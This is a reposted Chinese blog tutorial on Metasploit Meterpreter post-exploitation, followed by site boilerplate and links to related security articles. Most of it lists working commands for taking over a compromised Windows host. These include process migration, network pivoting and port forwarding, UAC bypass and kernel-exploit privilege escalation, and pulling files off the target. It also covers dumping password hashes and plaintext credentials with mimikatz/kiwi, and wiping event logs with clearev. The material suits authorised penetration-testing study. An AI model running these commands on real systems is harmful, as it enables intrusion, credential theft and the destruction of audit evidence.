meterpreter后渗透攻击

这篇具有很好参考价值的文章主要介绍了meterpreter后渗透攻击。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Meterpreter后渗透

msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势

  • 纯内存工作模式
  • 加密通信协议,而且同时与几个通道通信
  • 攻击进程内工作,多进程内迁移
  • 平台互通

进程迁移

通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任何写入操作.

1.meterpreter手工迁移

getpid命令查看自己的pid是多少
#迁移进程 找到一些比较经常出现在进程而且较稳定的服务进行迁移
migrate pid

#原本的进程会自动关闭,为了确保不存在最好再使用kill -9 pid强制删除

2.msf利用模块迁移

run post/windows/manage/migrate

系统命令

1.收集系统信息

sysinfo

2.查看网络设置

route

3.查看当前权限

getuid

4.查看网络结构

先进行跳转,输入background将meterpreter中断隐藏在后台

route add命令添加路由,

meterpreter > background
  backgrounding session 1 . . .
msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)
msf > route print

active routing table
subnet      netmask    gateway
192.168.1.0   255.255.255.0  session 1

网络类命令

ipconfig/ifconfig
arp -a
netstat -ano 

getproxy    #查看代理信息
route      #路由

端口转发

portfwd add -l 6666 -p 3389 - r 127.0.0.1    #将目标机的3389端口转发到本地6666端口

autoroute添加路由

run get_local_subnets
run autoroute -s 192.168.1.0/24    #添加到目标环境网络
run autoroute -p     #查看添加的路由

socks4a代理

autoroute添加完路由后,利用msf自带的socks4a代理

msf > use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

vi /etc/proxychains.conf    
socks4 127.0.0.1 1080

利用proxichains 访问

提权

getsystem提权

bypassuac提权

search bypassuac
有以下几个

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

 文章来源地址https://www.toymoban.com/news/detail-414251.html

例如:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

再次执行getsystem获取系统权限

内核漏洞提权

先用enum_patches收集补丁信息,查找可用的exploit进行提权

search enum_patches

meterpreter > run post/windows/gather/enum_patches    #查看补丁信息
msf > use exploit/windows/localms13_053_schlamperei
msf  > set session 2
msf > exploit

文件系统命令

1.查看当前处于目标机的哪个目录

pwd / getwd

getlwd:查看当前处于本地的某个目录

ls:列出当前目录所有文件

2.搜索指定类型的文件

search -f *.txt -d c:\

-f 用于指定搜索文件  -d 指定哪个目录下进行搜索

3.下载文件

download 目标机文件 攻击机目录

download c:\test.txt /root

4.上传文件

upload 攻击机文件 目标机路径

5在目标机切换目录

lcd /tmp    #操作攻击者主机 切换目录

抓密码

mimikatz抓

load kiwi
creds_all
1.hashdump
2.run windows/gather/smart_hashdump
3.run windows/gather/credentials/windows_autologin

清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志

执行文件

execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

 获得shell以后的获取敏感文件操作

判断是否为多网卡机器扫描其他网段

尽量收集机器上的敏感信息,敏感内部文件,账号密码本等

1.抓取自动登录的密码

run windows/gather/credentials/windows_autologin  #抓取用户存储的自动登录账户密码
meterpreter后渗透攻击

2导出密码hash

hashdump

 3.查看权限后,抓取密码

getuid
meterpreter后渗透攻击

#load mimikatz开启功能 / load kiwi
creds_all  #抓取密码 retrieving all credentials

meterpreter后渗透攻击

 

到了这里,关于meterpreter后渗透攻击的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CSRF漏洞原理攻击与防御(非常细)

    提示:以下是本篇文章正文内容,下面案例可供参考 CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪

    2024年03月20日
    浏览(57)
  • 浏览器渗透攻击-渗透测试模拟环境(9)

    介绍了浏览器供给面和堆喷射技术。 “客户端最流行的应用软件是什么,大家知道吗?” 这个简单的问题,你当然不会放过:“当然是浏览器,国内用得最多的估计还是 IE 浏览器,其实 360安全浏览器遨游啥的也都是基于IE内核的。” “OK,浏览器是客户端渗透攻击的首要目标

    2024年02月07日
    浏览(42)
  • 【渗透测试】漏洞扫描AWVS安装使用教程,三分钟手把手教会,非常简单

    Acunetix Web Vulnerability Scanner(简称AWVS)是一个 自动化 的Web漏洞扫描工具,它可以扫描任何通过 Web浏览器访问 和 遵循HITP/HTTPS 规则的Web站点。 AWVS原理是基于 漏洞匹配方法 ,通过 网络爬虫 测试你的网站安全,检测流行安全 AWVS可以检测什么漏洞,它有什么优势? AWVS可以通过

    2024年01月25日
    浏览(60)
  • 【渗透测试基础】越权攻击讲解

    越权,是攻击者在获得低权限账号后,利用一些方式绕过权限检查,访问或者操作到原本无权访问的高权限功能。在实际的代码安全审查中,这类漏洞很难通过工具进行自动化检测,因此危害很大。越权有两种类型: 垂直越权,是一种“基于URL的访问控制”设计缺陷引起的漏

    2024年02月05日
    浏览(46)
  • 网络渗透攻击与加固

    目录 一、内网渗透模拟攻击 1.1 综合扫描工具 1.1.1 X-scan 1.1.2 Zenmap 1.2 内网渗透模拟流程 二、Net命令 2.1 net user 2.1.1 功能 2.1.2 用法 2.2 net localgroup 2.2.1 功能 2.2.2 用法 2.3 net share 2.3.1 功能 2.3.2 用法 2.4 net use 2.4.1 功能 2.4.2 用法 三、渗透入侵前提 3.1 弱口令 3.2 受害机开放了很多

    2024年02月08日
    浏览(41)
  • 网络攻击(一)--安全渗透简介

    目标 了解渗透测试的基本概念 了解渗透测试从业人员的注意事项 在了解渗透测试之前,我们先看看,信息安全相关的法律是怎么样的 中华人民共和国网络安全法 《中华人民共和国网络安全法》由全国人民代表大会常务委员会于2016年11月7日发布, 自2017年6月1日起施行 。 中

    2024年02月04日
    浏览(43)
  • 渗透攻击方法:原型链污染

    目录 一、什么是原型链 1、原型对象 2、prototype属性 3、原型链 1、显示原型 2、隐式原型 3、原型链 4、constructor属性 二、原型链污染重现 实例 Nodejs沙箱逃逸 1、什么是沙箱(sandbox) 2、vm模块 JavaScript 中所有的对象都有一个内置属性,称为它的  prototype (原型)。它本身是一

    2024年02月14日
    浏览(41)
  • 《Kali渗透基础》16. 密码攻击

    本系列侧重方法论,各工具只是实现目标的载体。 命令与工具只做简单介绍,其使用另见《安全工具录》。 本文以 kali-linux-2023.2-vmware-amd64 为例。 身份认证:证明你是你声称的那个人。 非授权用户不受信任,认证用户可以访问相关资源。 认证类型: 你知道什么(账号密码

    2024年01月18日
    浏览(46)
  • Metasploit——渗透攻击模块(Exploit)

    Metasploit常用命令、技术功能模块   Metasploit——辅助模块(Auxiliary)  目录 1.Exploit模块 2.生成Payload  3.Meterpreter常用命令 4.弱点扫描 Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞             目标开放一个端口(服务),允许外界计算机连接这个端口(访问

    2024年02月11日
    浏览(47)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包